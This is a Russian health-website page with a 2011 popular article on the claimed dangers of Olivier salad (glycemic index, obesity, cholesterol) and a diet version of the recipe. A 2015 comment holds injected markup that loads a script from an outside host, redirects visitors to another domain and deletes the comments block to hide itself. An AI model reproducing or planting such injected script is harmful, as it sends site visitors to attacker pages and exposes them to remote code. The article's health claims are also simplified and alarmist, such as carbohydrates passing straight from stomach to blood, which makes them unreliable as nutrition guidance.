Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Продукты-обманщики. Оливь...  >>  Продукты-обманщики. Оливье
 
Обратная связь
 

Продукты-обманщики. Оливье

Размер шрифта
22 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Вареные овощи и вареная колбаса: разве может такое сочетание угрожать жизни и здоровью? Оказывается, может! Как приготовить оливье так, чтобы не навредить себе?

Салат Оливье получил название в честь своего создателя, шеф-повара Люсьена Оливье, державшего в Москве в начале 60-х годов XIX века ресторан парижской кухни «Эрмитаж». За рубежом первый новогодний салат известен под названием «Русский». В оригинальном рецепте были раковые шейки и мясо рябчика, но советские граждане заменили эти ингредиенты на более простые.

Недостатки «Оливье»

1. Оливье обладает высоким гликемическим индексом.

Чем выше гликемический индекс продукта, тем быстрее глюкозы выпускается в кровь и тем больше вырабатывается в ответ на это инсулина. После резкого всплеска инсулина и энергии вы быстрее чувствуете голод и усталость. И – снова налегаете на «Оливье».

Гликемический индекс основных ингредиентов:
Огурец соленый – 15
Зеленый горох консервированный – 35
Майонез – 60
Вареный картофель – 70
Вареная морковь – 85

2. Оливье вызывает ожирение

Это блюдо насыщено жирами (майонез) и углеводами (картофель). Простые углеводы сразу из желудка попадают в кровь, вызывая, таким образом, резкий выброс глюкозы в кровь, которая при переизбытке откладывается «на черный день» в виде гликогена в печени или в виде жировых отложений на разных участках тела.

Перевод углеводов в жиры осуществляется непосредственно в жировой ткани. Этот процесс находится под регулирующим влиянием гормона поджелудочной железы – инсулина. Глюкоза фосфорилируется, а затем расщепляется на триозы, которые используются для синтеза жирных кислот, что приводит к ожирению и повышению уровня триглицеридов.

3. Оливье грозит атеросклерозом

Высокий уровень триглицеридов и холестерина, которым богаты яйца и майонез, повышает риск атеросклероз. В 100 г салата – 163 мг холестерина. При этом суточная норма холестерина – 300 мг. Атеросклеротическая бляшка, образованная из холестерина, может стать неустойчивой и оторваться. А это – риск инсульта или инфаркта.

Что делать?

Приготовьте диетический вариант салата Оливье

Рецепт диетического салата Оливье

Ингредиенты:

– свежие огурцы (вместо соленых)
– яблоки или бланшированный цуккини вместо картофеля
– отварное куриное филе вместо колбасы
– йогурт с низкой жирностью вместо майонеза
– свежий горох вместо консервированного

Сварите куриное филе. Нарежьте овощи, яблоки или цуккини и куриное филе. Заправьте йогуртом.

Видеосюжеты по теме:

Салат-оливье. Продукт-обманщик

 


 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
От чего умирает Россия   Вся правда об импотенции мужа   Новый механизм контроля ожирения и атеросклероза   Пряники. Русское лакомство  
15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз! 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
10 причин перестать есть шашлык!
Убийцы эрекции вашего мужа
Что убьет эрекцию

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Знаете ли вы, как работает ваш желудок?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.